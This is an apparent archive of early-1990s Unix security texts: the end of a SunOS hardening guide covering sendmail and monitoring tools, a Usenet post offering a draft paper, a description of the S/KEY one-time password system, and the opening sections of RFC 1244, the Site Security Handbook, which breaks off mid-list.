The existence of the file /etc/security/passwd.adjunct has several
other effects in rc.local that improve system security; (ypbind -s
and rpc.mountd without -n).
More info: Ref 5

+ ensure all ID’s have passwd
Why:
Any ID without a password provides open access to your system,
Root comes without a password.
More info: passwd(5)
.
Modify mail system —–
Why:
The sendmail program itself has been notorious for numerous bugs that
gave crackers root access illegitimately. This is a huge topic and
should be a paper or book in itself. I claim no expertise here, and
to my great fortune my sendmail experience is limited. 😉
There are several different possible configurations and options
I’ll outline them and point you to further References.

Host configuration:
1. If you intend to send and receive mail directly on your machine.
Options are:
a. Live with sendmail – install the newest version 8.6.9 (currently)
.- ensure a mail file is always in existence for all users
Ref.10 &11.
– “chmod u-s /bin/mail” and change sendmail to use “procmail”
..or mail.local Ref. 17
. Ref.where to get???
– change sendmail default UID in sendmail.cf to 65534 “Ou65534”
– turn on security features of sendmail:
“Opauthwarnings needmailhelo noexpn novrfy restrictmailq”
Refs. 2 [Cheswick & Bellovin 94] & 9 [Costales 93]

b. Install zmailer — Ref 8 [URL to zmailer package]
– zmailer does not use /bin/mail so chmod u-s /bin/mail

2. If mail for your host is received on a different host (ie. local mail
delivery is handled by another host). Here your system should only
need to support outgoing mail. To prevent the sendmail daemon from
being started comment out the part or /etc/rc.local that starts
sendmail. For outgoing mail:
a. install latest version of sendmail.
. – see config 1 for thing to change in sendmail config.
– since mail delivery is being handled by main mail host
there is no need for /bin/mail so – chmod u-s /bin/mail
b. Install zmailer — Ref 8 [URL to zmailer package]
– zmailer does not use /bin/mail so chmod u-s /bin/mail

3. No need for mail whatsoever on this machine
(incoming, outgoing, or internal).
This is certainly most secure mode because e-mail will not be able to
be sent from or to this machine. This basic restriction of outside
access will prevent abuse of that access.
How:
To disable mail totally:
– chmod u-s /usr/lib/sendmail & /usr/lib/sendmail.mx & /bin/mail
– comment out the part of rc.local that starts sendmail

Packages to enable better monitoring and security:
————————

+ tripwire – Ref.13.
– Include all suid & sgid file in config.
– I’ve modified COPS script to check this with every run, awaiting
response from Dan Farmer if he minds my releasing script.
+ tcp wrappers – Ref.4.
+ Cops – Ref. 14
– Set up to run each night – be careful to check the
bitbucket output to ensure that it is working properly.
+ Modified portmapper, login, rshd, rlogind, pidentd from W. Venema
Ref. 15
+ TAMU tiger scripts – Ref. 16.

Note: the Australian group SERT has put together a package called
MegaPatch that includes several of these packages as well as many
of the patches to SunOS previously mentioned. Ref. 18
.
References
———-

[1] Dan Farmer & Wietse Venema, “Improving the security of your Site by
Breaking Into it”, 1993.
URL:ftp.win.tue.nl:/pub/security/admin-guide-to-cracking.Z

[2] W. Cheswick & S. Bellovin, “Firewalls and Internet Security,” Addison-
Wesley, April 94.

[3] H. Stern, “Managing NFS & NIS”, O’Reilly & Associates, April 92

[4] Wietse Venema, “TCP WRAPPER: Network monitoring, access control and
booby traps,” Proceedings of the Third Usenix Unix Security Symposium,
pg 85-92.
URL:ftp.win.tue.nl:/pub/security/tcp_wrapper.ps.Z (paper – .txt.Z avail)
URL:ftp.win.tue.nl:/pub/security/tcp_wrappers_6.3.shar.Z (package)

[5] Eric Oliver, “How to shadow without C2 Auditing”, June 94
URL:ftp.Hawaii.Edu:/????????

[6] [8lgm]-Advisory-7.UNIX.passwd.11-May-1994.NEWFIX

[7] Proactive password changing programs
(There are several this is the only one who’s URL I had available)
URL:info.mcs.anl.gov:/pub/systems/anlpasswd-2.2.tar.Z

[8] Zmailer package –
URL: cs.toronto.edu:/pub/zmailer.tar.Z
/pub/zmailer.README

[9] Bryan Costales, Eric Allman & Neil Rickert, “Sendmail,”
O’Reilly & Associates, June 93

8lgm advisories are avaiable though the 8lgm file server –
8lgm-fileserver@bagpuss.demon.co.uk
[10] [8lgm]-Advisory-5.UNIX.mail.24-Jan-1992
[11] [8lgm]-Advisory-5.UNIX.mail.24-Jan-1992.PATCH
[12] [8lgm]-Advisory-6.UNIX.mail2.2-May-1994

[13] Tripwire – Gene Kim & Gene Spafford 1994
URL:ftp.cs.purdue.edu:/pub/spaf/COAST/Tripwire

[14] Cops – Dan Farmer & Gene Spafford 1990
URL:ftp.cert.org:/pub/tools/cops

[15] portmapper, login, rshd, rlogind – Wietse Venema
URL:ftp.win.tue.nl:/pub/security/portmap.shar.Z
URL:ftp.win.tue.nl:/pub/security/logdaemon-XX.tar.Z

[16] TAMU tiger script. – Safford et al 93
URL:net.tamu.edu/pub/security/TAMU

[17] Local mail delivery agents:
URL:ftp.informatik.rwth-aachen.de:/pub/packages/procmail
URL:ftp —- ????? mail.local Joerg Czeranski

[18] MegaPatch – SERT
URL:ftp.sert.edu.au:/security/sert/tools/MegaPatch.1.7.tar.Z

[19] Source Routinng Patch –
URL:ftp.greatcircle.com:/pub/firewalls/digest/v03.n153.Z

Acknowledgements:
Thanks to all the people in comp.security.unix who offered their
suggestions, and thanks to the following people for their kind review:
casper@fwi.uva.nl (Casper Dik)
baron@uhunix.uhcc.Hawaii.Edu (Baron K Fujimoto)
rgoodman@uhunix.uhcc.Hawaii.Edu (Becky Goodman)
newsham@uhunix.uhcc.Hawaii.Edu (Tim Newsham)
andys@unipalm.co.uk (Andy Smith)

—— Other Thoughts for future development & other —
Didn’t have enough time to do these as well as I’d like.

+ disable routed (standard routing table)
Prevents receiving a false routing table.

+ remove /dev/nit?

+ Customizing ruserok() – a bit beyond the basics but here’s some info:
If you have source license to 4.1.3 modify the routine
ruserok() to return -1 for the cases you wish to disallow.
To disable .rhosts authentication entirely, simply have this routine
return -1. Look at the file /usr/lib/shlib.etc/README for how to modify
libc.so, note: also make the following changes:
in the file /usr/lib/shlib.etc/README below the line
% mv rpc_commondata. rpc_commondata.o
insert
% mv xccs.multibyte. xccs.multibyte.o
in the Makefile:
change the lines below to read as they do here:
OBJSORT=/usr/lib/shlib.etc/objsort
AWKFILE=/usr/lib/shlib.etc/awkfile
and add the -ldl option at the end of both ld command lines.

More info: ruserok(3), hosts.equiv(5)
source code file /lib/libc/net/rcmd.c Ref. 4, Ref. 15


tmk

———————————————————————–
Tom M. Kroeger Pray for wind
University of Hawaii Computing Center \ Pray for waves and
2565 The Mall, Keller Hall |\ Pray it’s your day off!
Honolulu HI 96822 (808) 956-2408 |~\
e-mail: tmk@uhunix.uhcc.hawaii.edu |__\
,—-+–

From shamel@mais.hydro.qc.ca Thu Jun 30 10:46:57 EDT 1994
Article: 35173 of comp.sys.sun.admin
Newsgroups: comp.sys.sun.admin,comp.sys.sun.apps,comp.sys.sun.wanted
Path: babbage.ece.uc.edu!news.kei.com!uhog.mit.edu!europa.eng.gtefsd.com!howland.reston.ans.net!spool.mu.edu!torn!utnut!utcsri!newsflash.concordia.ca!sifon!clouso.crim.ca!hobbit.ireq.hydro.qc.ca!shamel
From: shamel@mais.hydro.qc.ca (Stephane Hamel)
Subject: Re: System Administration Tools
Message-ID: <Cs7n2I.CI4@ireq.hydro.qc.ca>
Followup-To: comp.sys.sun.admin,comp.sys.sun.apps,comp.sys.sun.wanted
Sender: news@ireq.hydro.qc.ca (Netnews Admin)
Organization: Hydro-Quebec, Montreal, Canada
X-Newsreader: TIN [version 1.2 PL2]
References:
Date: Thu, 30 Jun 1994 12:37:30 GMT
Lines: 27
Xref: babbage.ece.uc.edu comp.sys.sun.admin:35173 comp.sys.sun.apps:8372 comp.sys.sun.wanted:5799

Since this topic often come’s around, I’ll make my draft copy of an extensive
document I am writting available for ftp (in PostScript format).

Be warned that it is still at an early stage, and probably contains lot’s of
bad english formulations (my mother language is french…).

But still, there is some valuable piece of information. And of course, I am
open to all comments, suggestions and extensions to the information contained
there.

The document is entitled “Management and monitoring tools in a distributed
heterogeneous client-server environment” available for ftp on
colt.mais.hydro.qc.ca (131.195.163.41) under /incoming/manmon.ps

\\\|///
\\ ~ ~ //
(/ @ @ /)
+————oOOo-(_)-oOOo———-+
| Stephane Hamel |
| Technical Advisor/System Admin. |
| Hydro-Quebec/TDSB |
| 680 Sherbrooke West, 2nd floor |
| Montreal, Qc (CANADA) H3C 4T8 |
| Phone : (514) 289-7916 |
| Fax : (514) 289-7926 |
| e-mail: shamel@mais.hydro.qc.ca |
+———————————–+

Description of the S/KEY One-Time Password System bty Neil M. Haller and Philip R. Karn

Description of The S/KEY One-Time Password System

Neil M. Haller nmh@thumper.bellcore.com
Philip R. Karn karn@chicago.qualcomm.com

ABSTRACT

The S/KEY one-time password system provides authentication over networks
that are subject to eavesdropping/reply attacks. This system has several
advantages compared with other one-time or multi-use authentication
systems. The user’s secret password never crosses the network during
login, or when executing other commands requiring authentication such as
the UNIX passwd or su commands. No secret information is stored anywhere,
including the host being protected, and the underlying algorithm may be
(and it fact, is) public knowledge. The remote end of this system can run
on any locally available computer. The host end could be integrated into
any application requiring authentication.

Trademarks
———-
Athena and Kerberos of trademarks of MIT.
S/KEY is a trademark of Bellcore.
SPX and DEC are trademarks of Digital Equipment Company.
UNIX is a registered trademark of UNIX System Laboratories, Inc.

Attributes of the S/KEY One-Time Password System
————————————————

The S/KEY authentication system is a simple scheme that protects user
passwords against passive attacks. It is not as powerful or general in
scope as Kerberos or SDASS; nor does it protect against active attacks.
It can, however, be easily and quickly added to almost any UNIX system
without requiring any additional hardware and without requiring the
system to store information (such as plain text passwords) that would
be more sensitive than the encrypted passwords already stored. The
S/KEY system can be used with non programmable terminals or personal
computers (e.g., systems running DOS or Apple Macintoshes) with
conventional communications programs.

Some of the properties of the S/KEY system are:

o Eavesdropping protection

o Conceptually simple and easy to use

o Based on a memorized secret password; does not require a
special device although it can easily be adapted to do so.

o Can be automated for authentication from a trusted system.
(Can also be partially automated for fast operation.)

o No secret algorithms.

o No secrets stored on host.

Description of the S/KEY One-Time Password System
————————————————-

There are two sides to the operation of our one-time password system.
On the user (or client) side, the appropriate one-time password must
be generated. On the system (server) side, the one-time password must
be verified. One time passwords are generated and verified using a
one-way function based on MD4 [Rivest]. (Conversion to MD5 would be
trivial)

We have defined our one-way function to take 8 bytes of input and to
produce 8 bytes of output. This is done by running the 8 bytes of
input through MD4 and then “folding” pairs of bytes in the 16-byte MD4
output down to 8 bytes with exclusive-OR operations. This allows us to
apply the one-way function an arbitrary number of times.

Generation of One-Time Passwords

The sequence of one-time passwords is produced by applying the one-way
function multiple times. That is, the first one-way password is
produced by running the user’s secret password (s) through the one-way
function some specified number of times, (n). Assuming n=4,

p(1) = f(f(f(f(s))))

The next one-way password is generated by running the user’s password
through the one-way function only n-1 times.

p(2) = f(f(f(s)))

An eavesdropper who has monitored the use of the one-time password
p(i) will not be able to generate the next one in the sequence p(i+1)
because doing so would require inverting the one-way function. Without
knowing the secret key that was the starting point of the function
iterations, this can not be done.

Seeding the Password

A user might want to use the same secret password on several machines,
or might allow the iteration count to go to zero. An initial step
concatenates a seed with the arbitrary length secret password, crunches
the result with MD4, and folds the result to 64 bits. The result of
this process is then iterated n times.

System Verification of Passwords

The host computer first saves a copy of the one-time password it
receives, then it applies the one-way function to it. If the result
does not match the copy stored in the system’s password file, then the
request fails. If they match, then the user’s entry in the system
password file is updated with the copy of the one-time password that
was saved before the final execution (by the server) of the one-way
function. This updating advances the password sequence.

Because the number of one-way function iterations executed by the user
decreases by one each time, at some point the user must reinitialize the
system or be unable to log in again. This is done by executing a
special version of the passwd command to start a new sequence of
one-time passwords. This operation is essentially identical to a
normal authentication, except that the one-time password receive
over the network is not checked against the entry already in the
password file before it replaces it. In this way, the selection of a
new password can be done safely even in the presence of an eavesdropper.

Operation of S/KEY One-Time Password System
——————————————-

Overview

The S/KEY one-time password authentication system uses computation to
generate a finite sequence of single-use passwords from a single secret.
The security is entirely based on a single secret that is known only to
the user. Alternatively, part of or the entire secret can be stored in a
non-retrievable way, in the computing device.

Generation of S/KEY One-Time Passwords

As mentioned above, the one-time password sequence is derived from the
secret password using a computer. The required computation has been
executed on a variety of PC and UNIX class machines including notebook
and palm-tops. A vendor has estimated that credit card size devices
could be built for less than $30 in large quantities.

The program can also be stored on and executed from a standard floppy
disk. This would allow operation on a remote computer that could not be
entirely trusted not to contain a Trojan Horse that would attempt
to capture the secret password. It is sometimes useful to pre-compute
and print several one-time passwords. These could be carried on a trip
where public terminals or workstations were available, but no trusted
local computation was available.

Description of Operation

The following narrative describes the procedure for logging into a UNIX
system using the S/KEY one-time password system. To illustrate the
most complex case, we assume a hand-held PC compatible computer is used.

o The user, call her Sue, identifies herself to the system by login name.

o The system issues a challenge including the sequence number of the
one-time password expected and a “seed” that is unique to the system.
This “seed” allows Sue to securely use a single secret for several
machines. Here the seed is “unix3” and the sequence number is 54.

o Sue enters 54 and unix3 into her palm-top computer. She is prompted
for her secret password.

o Sue enters her secret password that may be of any length. The palm-top
computes the 54th one-time password and displays it.

o Sue enters the one-time password and is authenticated.

o Next time Sue wants access, she will be prompted for one-time
password sequence number 53.

Semi-Automated Operation

The complexity illustrated above is necessary only when using a terminal
that is not programmable by the user, or when using a non-trusted
terminal. We have built semi-automatic interfaces for clients using
communications software on popular personal computers. The following
example illustrates logging in using a trusted personal computer and a
popular terminal emulation program.

o Before starting the communication program, Sue runs the CTKEY
program that ties a TSR to a “hot-key” such as F10.

o Sue identifies herself by login name as above.

o The system issues the same challenge including the seed “unix3”
and the sequence number 54. The host system now expects an
s/key one-time password.

o Sue presses the hot-key and is then prompted for a secret password
by the TSR program on the local system.

o In response to Sue’s secret password, the 54th one-time password
is displayed at the position of the cursor.

o Sue presses “Insert” and the terminal emulator transmits the
one-time password completing the authentication.

If the personal computer were in a trusted location, an option of the
CTKEY program allows the secret password to be stored in a local file.

Form of Password

Internally the one-time password is a 64 bit number. Entering a 64 bit
number is not a pleasant task. The one-time password is therefore
converted to a sequence of six short words (1 to 4 letters). Each word
is chosen from a dictionary of 2048 words. The contents of this
dictionary is not a secret.

Source Screening

It is frequently desirable to allow internal access with a multi-use
password while requiring one-time passwords for external access.
A screening table provides this function. When this table is present,
login attempts that pass the screening test are permitted to use the
normal password or a one-time password. Others are notified that the
use of the one-time password is required.

Password echo

Normally systems disable printing during the typing of a password so
that an onlooker cannot steal the password. With a one-time password,
this is unnecessary. The replacement login command allows the user
to turn echo on by pressing “return” at the password prompt. This
makes it easier to enter the longer one-time password.

Acknowledgments
—————
The idea behind our system was originally described by Leslie Lamport.
Some details of the design were contributed by John S. Walden who
wrote the initial version of the client software.

References
———-

Eugene H. Spafford, “The internet worm program: An analysis.” Computer
Communications Review 19(1):17-57, January 1989.

D. C. Feldmeier and P. R. Karn, “UNIX Password Security – Ten Years
Later”, Crypto ’89 Conference , Santa Barbara, CA August 20-24, 1989.

J. G. Steiner, C. Neuman, and J. I. Schiller. “Kerberos: An
authentication service for open network systems.” USENIX Conference
Proceedings, pp. 191-202, Dallas, Texas, February 1988.

Catherine R. Avril and Ronald L. Orcutt. Athena: MIT’s Once and
Future Distributed Computing Project. Information
Technology Quarterly , Fall 1990, pp. 4-11.

R. L. Rivest, The MD4 Message Digest Algorithm, Crypto ’90 Abstracts
(August 1990), 281-291.

Leslie Lamport, “Password Authentication with Insecure Communication”,
Communications of the ACM 24.11 (November 1981), 770-772.

Site Security Handbook, 1991

Network Working Group P. Holbrook
Request for Comments: 1244 CICNet
FYI: 8 J. Reynolds
ISI
Editors
July 1991

Site Security Handbook

Status of this Memo

This handbook is the product of the Site Security Policy Handbook
Working Group (SSPHWG), a combined effort of the Security Area and
User Services Area of the Internet Engineering Task Force (IETF).
This FYI RFC provides information for the Internet community. It
does not specify an Internet standard. Distribution of this memo is
unlimited.

Contributing Authors

The following are the authors of the Site Security Handbook. Without
their dedication, this handbook would not have been possible.

Dave Curry (Purdue University), Sean Kirkpatrick (Unisys), Tom
Longstaff (LLNL), Greg Hollingsworth (Johns Hopkins University),
Jeffrey Carpenter (University of Pittsburgh), Barbara Fraser (CERT),
Fred Ostapik (SRI NISC), Allen Sturtevant (LLNL), Dan Long (BBN), Jim
Duncan (Pennsylvania State University), and Frank Byrum (DEC).

Editors’ Note

This FYI RFC is a first attempt at providing Internet users guidance
on how to deal with security issues in the Internet. As such, this
document is necessarily incomplete. There are some clear shortfalls;
for example, this document focuses mostly on resources available in
the United States. In the spirit of the Internet’s “Request for
Comments” series of notes, we encourage feedback from users of this
handbook. In particular, those who utilize this document to craft
their own policies and procedures.

This handbook is meant to be a starting place for further research
and should be viewed as a useful resource, but not the final
authority. Different organizations and jurisdictions will have
different resources and rules. Talk to your local organizations,
consult an informed lawyer, or consult with local and national law
enforcement. These groups can help fill in the gaps that this
document cannot hope to cover.

Site Security Policy Handbook Working Group [Page 1]

RFC 1244 Site Security Handbook July 1991

Finally, we intend for this FYI RFC to grow and evolve. Please send
comments and suggestions to: ssphwg@cert.sei.cmu.edu.

Table of Contents

1. Introduction…………………………………………….. 3
1.1 Purpose of this Work…………………………………….. 3
1.2 Audience……………………………………………….. 3
1.3 Definitions…………………………………………….. 4
1.4 Related Work……………………………………………. 4
1.5 Scope………………………………………………….. 4
1.6 Why Do We Need Security Policies and Procedures?……………. 5
1.7 Basic Approach………………………………………….. 7
1.8 Organization of this Document…………………………….. 7
2. Establishing Official Site Policy on Computer Security……….. 9
2.1 Brief Overview………………………………………….. 9
2.2 Risk Assessment…………………………………………. 10
2.3 Policy Issues…………………………………………… 13
2.4 What Happens When the Policy Is Violated…………………… 19
2.5 Locking In or Out……………………………………….. 21
2.6 Interpreting the Policy………………………………….. 23
2.7 Publicizing the Policy…………………………………… 23
3. Establishing Procedures to Prevent Security Problems…………. 24
3.1 Security Policy Defines What Needs to be Protected………….. 24
3.2 Identifing Possible Problems……………………………… 24
3.3 Choose Controls to Protect Assets in a Cost-Effective Way……. 26
3.4 Use Multiple Strategies to Protect Assets………………….. 26
3.5 Physical Security……………………………………….. 27
3.6 Procedures to Recognize Unauthorized Activity………………. 27
3.7 Define Actions to Take When Unauthorized Activity is Suspected.. 29
3.8 Communicating Security Policy…………………………….. 30
3.9 Resources to Prevent Security Breaches…………………….. 34
4. Types of Security Procedures………………………………. 56
4.1 System Security Audits…………………………………… 56
4.2 Account Management Procedures…………………………….. 57
4.3 Password Management Procedures……………………………. 57
4.4 Configuration Management Procedures……………………….. 60
5. Incident Handling………………………………………… 61
5.1 Overview……………………………………………….. 61
5.2 Evaluation……………………………………………… 65
5.3 Possible Types of Notification……………………………. 67
5.4 Response……………………………………………….. 71
5.5 Legal/Investigative……………………………………… 73
5.6 Documentation Logs………………………………………. 77
6. Establishing Post-Incident Procedures………………………. 78
6.1 Overview……………………………………………….. 78
6.2 Removing Vulnerabilities…………………………………. 78
6.3 Capturing Lessons Learned………………………………… 80

Site Security Policy Handbook Working Group [Page 2]

RFC 1244 Site Security Handbook July 1991

6.4 Upgrading Policies and Procedures…………………………. 81
7. References………………………………………………. 81
8. Annotated Bibliography……………………………………. 83
8.1 Computer Law……………………………………………. 84
8.2 Computer Security……………………………………….. 85
8.3 Ethics…………………………………………………. 91
8.4 The Internet Worm……………………………………….. 93
8.5 National Computer Security Center (NCSC)…………………… 95
8.6 Security Checklists……………………………………… 99
8.7 Additional Publications………………………………….. 99
9. Acknlowledgements…………………………………………101
10. Security Considerations…………………………………..101
11. Authors’ Addresses……………………………………….101

1. Introduction

1.1 Purpose of this Work

This handbook is a guide to setting computer security policies and
procedures for sites that have systems on the Internet. This guide
lists issues and factors that a site must consider when setting their
own policies. It makes some recommendations and gives discussions of
relevant areas.

This guide is only a framework for setting security policies and
procedures. In order to have an effective set of policies and
procedures, a site will have to make many decisions, gain agreement,
and then communicate and implement the policies.

1.2 Audience

The audience for this work are system administrators and decision
makers (who are more traditionally called “administrators” or “middle
management”) at sites. This document is not directed at programmers
or those trying to create secure programs or systems. The focus of
this document is on the policies and procedures that need to be in
place to support any technical security features that a site may be
implementing.

The primary audience for this work are sites that are members of the
Internet community. However, this document should be useful to any
site that allows communication with other sites. As a general guide
to security policies, this document may also be useful to sites with
isolated systems.

Site Security Policy Handbook Working Group [Page 3]

RFC 1244 Site Security Handbook July 1991

1.3 Definitions

For the purposes of this guide, a “site” is any organization that
owns computers or network-related resources. These resources may
include host computers that users use, routers, terminal servers,
PC’s or other devices that have access to the Internet. A site may
be a end user of Internet services or a service provider such as a
regional network. However, most of the focus of this guide is on
those end users of Internet services.

We assume that the site has the ability to set policies and
procedures for itself with the concurrence and support from those who
actually own the resources.

The “Internet” is those set of networks and machines that use the
TCP/IP protocol suite, connected through gateways, and sharing a
common name and address spaces [1].

The term “system administrator” is used to cover all those who are
responsible for the day-to-day operation of resources. This may be a
number of individuals or an organization.

The term “decision maker” refers to those people at a site who set or
approve policy. These are often (but not always) the people who own
the resources.

1.4 Related Work

The IETF Security Policy Working Group (SPWG) is working on a set of
recommended security policy guidelines for the Internet [23]. These
guidelines may be adopted as policy by regional networks or owners of
other resources. This handbook should be a useful tool to help sites
implement those policies as desired or required. However, even
implementing the proposed policies isn’t enough to secure a site.
The proposed Internet policies deal only with network access
security. It says nothing about how sites should deal with local
security issues.

1.5 Scope

This document covers issues about what a computer security policy
should contain, what kinds of procedures are need to enforce
security, and some recommendations about how to deal with the
problem. When developing a security policy, close attention should
be made not only on the security needs and requirements of the local
network, but also the security needs and requirements of the other
interconnected networks.

Site Security Policy Handbook Working Group [Page 4]

RFC 1244 Site Security Handbook July 1991

This is not a cookbook for computer security. Each site has
different needs; the security needs of a corporation might well be
different than the security needs of an academic institution. Any
security plan has to conform to the needs and culture of the site.

This handbook does not cover details of how to do risk assessment,
contingency planning, or physical security. These things are
essential in setting and implementing effective security policy, but
this document leaves treatment of those issues to other documents.
We will try to provide some pointers in that direction.

This document also doesn’t talk about how to design or implement
secure systems or programs.

1.6 Why Do We Need Security Policies and Procedures?

For most sites, the interest in computer security is proportional to
the perception of risk and threats.

The world of computers has changed dramatically over the past
twenty-five years. Twenty-five years ago, most computers were
centralized and managed by data centers. Computers were kept in
locked rooms and staffs of people made sure they were carefully
managed and physically secured. Links outside a site were unusual.
Computer security threats were rare, and were basically concerned
with insiders: authorized users misusing accounts, theft and
vandalism, and so forth. These threats were well understood and
dealt with using standard techniques: computers behind locked doors,
and accounting for all resources.

Computing in the 1990’s is radically different. Many systems are in
private offices and labs, often managed by individuals or persons
employed outside a computer center. Many systems are connected into
the Internet, and from there around the world: the United States,
Europe, Asia, and Australia are all connected together.

Security threats are different today. The time honored advice says
“don’t write your password down and put it in your desk” lest someone
find it. With world-wide Internet connections, someone could get
into your system from the other side of the world and steal your
password in the middle of the night when your building is locked up.
Viruses and worms can be passed from machine to machine. The
Internet allows the electronic equivalent of the thief who looks for
open windows and doors; now a person can check hundreds of machines
for vulnerabilities in a few hours.

System administrators and decision makers have to understand the
security threats that exist, what the risk and cost of a problem

Site Security Policy Handbook Working Group [Page 5]

RFC 1244 Site Security Handbook July 1991

would be, and what kind of action they want to take (if any) to
prevent and respond to security threats.

As an illustration of some of the issues that need to be dealt with
in security problems, consider the following scenarios (thanks to
Russell Brand [2, BRAND] for these):

– A system programmer gets a call reporting that a
major underground cracker newsletter is being
distributed from the administrative machine at his
center to five thousand sites in the US and
Western Europe.

Eight weeks later, the authorities call to inform
you the information in one of these newsletters
was used to disable “911” in a major city for
five hours.

– A user calls in to report that he can’t login to his
account at 3 o’clock in the morning on a Saturday. The
system staffer can’t login either. After rebooting to
single user mode, he finds that password file is empty.
By Monday morning, your staff determines that a number
of privileged file transfers took place between this
machine and a local university.

Tuesday morning a copy of the deleted password file is
found on the university machine along with password
files for a dozen other machines.

A week later you find that your system initialization
files had been altered in a hostile fashion.

– You receive a call saying that a breakin to a government
lab occurred from one of your center’s machines. You
are requested to provide accounting files to help
trackdown the attacker.

A week later you are given a list of machines at your
site that have been broken into.

– A reporter calls up asking about the breakin at your
center. You haven’t heard of any such breakin.

Three days later, you learn that there was a breakin.
The center director had his wife’s name as a password.

Site Security Policy Handbook Working Group [Page 6]

RFC 1244 Site Security Handbook July 1991

– A change in system binaries is detected.

The day that it is corrected, they again are changed.
This repeats itself for some weeks.

– If an intruder is found on your system, should you
leave the system open to monitor the situation or should
you close down the holes and open them up again later?

– If an intruder is using your site, should you call law
enforcement? Who makes that decision? If law enforcement asks
you to leave your site open, who makes that decision?

– What steps should be taken if another site calls you and says
they see activity coming from an account on your system? What
if the account is owned by a local manager?

1.7 Basic Approach

Setting security policies and procedures really means developing a
plan for how to deal with computer security. One way to approach
this task is suggested by Fites, et. al. [3, FITES]:

– Look at what you are trying to protect.
– Look at what you need to protect it from.
– Determine how likely the threats are.
– Implement measures which will protect your assets in a
cost-effective manner.
– Review the process continuously, and improve things every time
a weakness is found.

This handbook will concentrate mostly on the last two steps, but the
first three are critically important to making effective decisions
about security. One old truism in security is that the cost of
protecting yourself against a threat should be less than the cost
recovering if the threat were to strike you. Without reasonable
knowledge of what you are protecting and what the likely threats are,
following this rule could be difficult.

1.8 Organization of this Document

This document is organized into seven parts in addition to this
introduction.

The basic form of each section is to discuss issues that a site might
want to consider in creating a computer security policy and setting
procedures to implement that policy. In some cases, possible options
are discussed along with the some of the ramifications of those

Site Security Policy Handbook Working Group [Page 7]

RFC 1244 Site Security Handbook July 1991

choices. As far as possible, this document tries not to dictate the
choices a site should make, since these depend on local
circumstances. Some of the issues brought up may not apply to all
sites. Nonetheless, all sites should at least consider the issues
brought up here to ensure that they do not miss some important area.

The overall flow of the document is to discuss policy issues followed
by the issues that come up in creating procedures to implement the
policies.

Section 2 discusses setting official site policies for access to
computing resources. It also goes into the issue of what happens
when the policy is violated. The policies will drive the procedures
that need to be created, so decision makers will need to make choices
about policies before many of the procedural issues in following
sections can be dealt with. A key part of creating policies is doing
some kind of risk assessment to decide what really needs to be
protected and the level of resources that should be applied to
protect them.

Once policies are in place, procedures to prevent future security
problems should be established. Section 3 defines and suggests
actions to take when unauthorized activity is suspected. Resources
to prevent secruity breaches are also discussed.

Section 4 discusses types of procedures to prevent security problems.
Prevention is a key to security; as an example, the Computer
Emergency Response Team/Coordination Center (CERT/CC) at Carnegie-
Mellon University (CMU) estimates that 80% or more of the problems
they see have to do with poorly chosen passwords.

Section 5 discusses incident handling: what kinds of issues does a
site face when someone violates the security policy. Many decisions
will have to made on the spot as the incident occurs, but many of the
options and issues can be discussed in advance. At very least,
responsibilities and methods of communication can be established
before an incident. Again, the choices here are influenced by the
policies discussed in section 2.

Section 6 deals with what happens after a security violation has been
dealt with. Security planning is an on-going cycle; just after an
incident has occurred is an excellent opportunity to improve policies
and procedures.

The rest of the document provides references and an annotated
bibliography.

Site Security Policy Handbook Working Group [Page 8]

RFC 1244 Site Security Handbook July 1991

2. Establishing Official Site Policy on Computer Security

2.1 Brief Overview

2.1.1 Organization Issues

The goal in developing an official site policy on computer
security is to define the organization’s expectations of proper
computer and network use and to define procedures to prevent and
respond to security incidents. In order to do this, aspects of
the particular organization must be considered.

First, the goals and direction of the organization should be
considered. For example, a military base may have very different
security concerns from a those of a university.

Second, the site security policy developed must conform to
existing policies, rules, regulations and laws that the
organization is subject to. Therefore it will be necessary to
identify these and take them into consideration while developing
the policy.

Third, unless the local network is completely isolated and
standalone, it is necessary to consider security implications in a
more global context. The policy should address the issues when
local security problems develop as a result of a remote site as
well as when problems occur on remote systems as a result of a
local host or user.

2.1.2 Who Makes the Policy?

Policy creation must be a joint effort by technical personnel, who
understand the full ramifications of the proposed policy and the
implementation of the policy, and by decision makers who have the
power to enforce the policy. A policy which is neither
implementable nor enforceable is useless.

Since a computer security policy can affect everyone in an
organization, it is worth taking some care to make sure you have
the right level of authority in on the policy decisions. Though a
particular group (such as a campus information services group) may
have responsibility for enforcing a policy, an even higher group
may have to support and approve the policy.

2.1.3 Who is Involved?

Establishing a site policy has the potential for involving every
computer user at the site in a variety of ways. Computer users

Site Security Policy Handbook Working Group [Page 9]

RFC 1244 Site Security Handbook July 1991

may be responsible for personal password administration. Systems
managers are obligated to fix security holes and to oversee the
system.

It is critical to get the right set of people involved at the
start of the process. There may already be groups concerned with
security who would consider a computer security policy to be their
area. Some of the types of groups that might be involved include
auditing/control, organizations that deal with physical security,
campus information systems groups, and so forth. Asking these
types of groups to “buy in” from the start can help facilitate the
acceptance of the policy.

2.1.4 Responsibilities

A key element of a computer security policy is making sure
everyone knows their own responsibility for maintaining security.
A computer security policy cannot anticipate all possibilities;
however, it can ensure that each kind of problem does have someone
assigned to deal with it.

There may be levels of responsibility associated with a policy on
computer security. At one level, each user of a computing
resource may have a responsibility to protect his account. A user
who allows his account to be compromised increases the chances of
compromising other accounts or resources.

System managers may form another responsibility level: they must
help to ensure the security of the computer system. Network
managers may reside at yet another level.

2.2 Risk Assessment

2.2.1 General Discussion

One of the most important reasons for creating a computer security
policy is to ensure that efforts spent on security yield cost
effective benefits. Although this may seem obvious, it is
possible to be mislead about where the effort is needed. As an
example, there is a great deal of publicity about intruders on
computers systems; yet most surveys of computer security show that
for most organizations, the actual loss from “insiders” is much
greater.

Risk analysis involves determining what you need to protect, what
you need to protect it from, and how to protect it. Is is the
process of examining all of your risks, and ranking those risks by
level of severity. This process involves making cost-effective

Site Security Policy Handbook Working Group [Page 10]

RFC 1244 Site Security Handbook July 1991

decisions on what you want to protect. The old security adage
says that you should not spend more to protect something than it
is actually worth.

A full treatment of risk analysis is outside the scope of this
document. [3, FITES] and [16, PFLEEGER] provide introductions to
this topic. However, there are two elements of a risk analysis
that will be briefly covered in the next two sections:

1. Identifying the assets
2. Identifying the threats

For each asset, the basic goals of security are availability,
confidentiality, and integrity. Each threat should be examined
with an eye to how the threat could affect these areas.

2.2.2 Identifying the Assets

One step in a risk analysis is to identify all the things that
need to be protected. Some things are obvious, like all the
various pieces of hardware, but some are overlooked, such as the
people who actually use the systems. The essential point is to
list all things that could be affected by a security problem.

One list of categories is suggested by Pfleeger [16, PFLEEGER,
page 459]; this list is adapted from that source:

1. Hardware: cpus, boards, keyboards, terminals,
workstations, personal computers, printers, disk
